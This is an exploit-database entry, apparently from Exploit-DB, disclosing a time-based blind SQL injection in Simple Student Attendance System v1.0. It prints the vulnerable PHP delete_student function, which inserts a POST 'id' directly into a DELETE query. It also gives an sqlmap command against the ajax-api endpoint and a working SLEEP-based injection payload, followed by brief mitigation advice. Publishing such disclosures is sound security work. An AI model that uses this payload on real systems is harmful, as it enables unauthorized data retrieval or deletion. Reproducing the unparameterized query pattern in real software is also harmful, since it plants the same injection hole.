header-logo
Suggest Exploit
vendor:
Simple Student Attendance System
by:
Gnanaraj Mauviel
6.1
CVSS
HIGH
Time Based Blind SQL Injection
89
CWE
Product Name: Simple Student Attendance System
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE:
CPE: a:oretnom23:simple_student_attendance_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Mac OSX, XAMPP, Apache, MySQL
2023

Simple Student Attendance System – Time Based Blind SQL Injection

The Simple Student Attendance System is vulnerable to a Time-Based Blind SQL Injection in the delete_student function of actions.class.php. An attacker can manipulate the 'id' parameter to execute malicious SQL queries, potentially leading to unauthorized data retrieval or modification. The vulnerability has been tested using sqlmap tool with a time-based blind technique.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks. Regular security audits and code reviews are recommended to identify and address such vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(/php-attendance/classes/actions.class.php):

public function delete_student(){
extract($_POST);
$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");
if($delete){
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];
return [ "status" => "success" ];
}else{
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];
return [ "status" => "error", "Student has failed to deleted!" ];
}
}

-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch
---
Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW
---

Navigation

Suggest Exploit

Services By CQR